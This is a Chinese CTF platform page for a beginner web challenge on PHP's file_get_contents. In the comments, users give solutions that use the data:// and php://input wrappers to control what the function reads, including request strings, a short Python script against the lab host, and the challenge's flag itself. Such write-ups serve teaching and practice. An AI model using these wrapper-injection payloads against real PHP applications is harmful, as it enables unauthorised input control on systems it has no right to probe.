file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 5418
提  示:
描  述:
file_get_contents????
评论
HK1ng 1年前

file_get_contents常用来读文件,但是也可以用伪协议来控制读的内容,这里就是使用data://text/plain,test。指定数据的 MIME 类型位text,然后内容是test,这个时候我们就控制了读取的内容,只需要传参ac位test即可拿到flag。

回复 0

goodsnack 1年前

post ac=1&fn=php://input raw里填1,对应ac的值

回复 0

Zhumeng 1年前

看到file_get_getcontents就要想到伪协议

回复 1

Melancholy 1年前

使用BP POST /?ac=1&fn=php://input HTTP/1.1 参数 1

回复 0

飞天的母猪 1年前

flag{688ebf9ece3756a3a5ac4e16616f1873}

回复 0

xiazhi 1年前

url/?ac=bugku&fn=flag.txt

回复 1

bbggddaa 1年前

https://blog.csdn.net/silence1_/article/details/90241302

回复 0

LLTVLL 1年前

?ac=123&fn=php://input,hackbar中post参数1

回复 0

2324291123 2年前

import requests url='http://114.67.175.224:15234/' url = url + '?ac=f&fn=php://input' data={'f'} re=requests.post(url, data) print(type(re)) print(re.text)

回复 0

一路奔腾 2年前

file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/

回复 0

WriteUp

image
harry

3 金币

评分(8)

解题动态

huasan2410 攻破了该题 15小时前
yuanchu 攻破了该题 18小时前
VCD 攻破了该题 19小时前
花猫咪 攻破了该题 1天前
gm26ctf 攻破了该题 2天前
kimol 攻破了该题 3天前
nonlvyx 攻破了该题 3天前
qqai 攻破了该题 3天前
white1build 攻破了该题 4天前
lps666 攻破了该题 5天前
AWDAI 攻破了该题 5天前
yt430u 攻破了该题 5天前
wauo3 攻破了该题 5天前
niubill 攻破了该题 5天前
青春小豆 攻破了该题 5天前
Versemos 攻破了该题 6天前
ljjbit 攻破了该题 6天前
MirrorJon 攻破了该题 6天前
bzsy01 攻破了该题 7天前
遥遥相望 攻破了该题 7天前
问题反馈